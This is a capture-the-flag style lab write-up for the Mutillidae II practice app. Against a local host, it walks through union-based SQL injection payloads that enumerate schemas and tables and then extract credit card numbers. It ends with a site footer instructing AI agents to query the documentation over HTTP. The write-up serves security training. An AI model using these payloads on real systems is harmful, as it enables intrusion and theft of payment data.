# Pivoting with SQL injection

## Lab 10: SQL Injection - Pivoting with SQL injection

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2F9TRE88RYQbkm9y6BQVEg%2Fimage.png?alt=media&#x26;token=cb7f23f8-09ad-43ad-9baa-af48a2e2de73" alt=""><figcaption></figcaption></figure>

Go to User Lookup page <http://127.0.0.1/index.php?page=user-info.php>

We just know that there're 10 columns, than we can utilize UNION operator to do a Union-Based SQLi, and try multiple possible colum names regarding credit card such as: creditcard, credit\_card, etc..

Payload -> `' UNION SELECT 1,2,3,4,5,6,7,8,9,1 FROM <column_name> --`&#x20;

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FF64qFGA9Tkwcq5P29WD5%2Fimage.png?alt=media&#x26;token=7cb214a4-25b3-456d-9338-2c57bc2d1619" alt=""><figcaption></figcaption></figure>

for 'creditcard' column name we've an error, then it's not the correct answer.

The right column name is: 'credit\_card': `' UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM credit_cards --`&#x20;

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FT4XBCgqi4dDztoPJb1HD%2Fimage.png?alt=media&#x26;token=9297d902-ca7d-40ac-925d-95fbaf487457" alt=""><figcaption></figcaption></figure>

Great, we can retrieve info about db type, and version (answer of lab 11) utilizing this query:

`' UNION SELECT 1, database(),version(),user(),5,6,7,8,9,10--`&#x20;

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FtSZlfZnBIvQPH0lc1fab%2Fimage.png?alt=media&#x26;token=c546dfd6-2989-44c7-a7c8-cb0cc9607a75" alt=""><figcaption></figcaption></figure>

and discover all installed DBs using the following query:

`' UNION SELECT 1,schema_name,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.SCHEMATA--`&#x20;

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2Fg89mMzc7QCY7pcc3lZZP%2Fimage.png?alt=media&#x26;token=c4d2f83f-ca61-410c-9a43-7879f90f6e95" alt=""><figcaption></figcaption></figure>

Great, at this time we need to understand which db and table have credit\_cards as column:

' UNION SELECT 1,COLUMN\_NAME,TABLE\_NAME,4,5,6,7,8,9,10 TABLE\_SCHEMA FROM \<db\_name>.COLUMNS WHERE table\_name='credit\_cards'--

In this case the first one value 'information\_schema' is the db\_name:

' UNION SELECT 1,COLUMN\_NAME,TABLE\_NAME,4,5,6,7,8,9,10 TABLE\_SCHEMA FROM INFORMATION\_SCHEMA.COLUMNS WHERE table\_name='credit\_cards'--

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FTW7Gz8eg8fpSVFiPM2uD%2Fimage.png?alt=media&#x26;token=fa797141-eed9-445f-ad3f-b26bd55697bd" alt=""><figcaption></figcaption></figure>

The results provide us more info about columns, in this case we need to know only the ccnumber:

`' UNION SELECT 1,ccid,ccnumber,4,5,6,7,8,9,10 FROM credit_cards--`&#x20;

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FKw1BZdeP9s2pzkMAi0k4%2Fimage.png?alt=media&#x26;token=2f02b532-f93d-41bf-8d9c-f46adbb79c0f" alt=""><figcaption></figcaption></figure>

and obtain the ccnumber (the last of photo) regarding our response!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/writeups-and-walkthroughs/mutillidae-ii/sqli/pivoting-with-sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.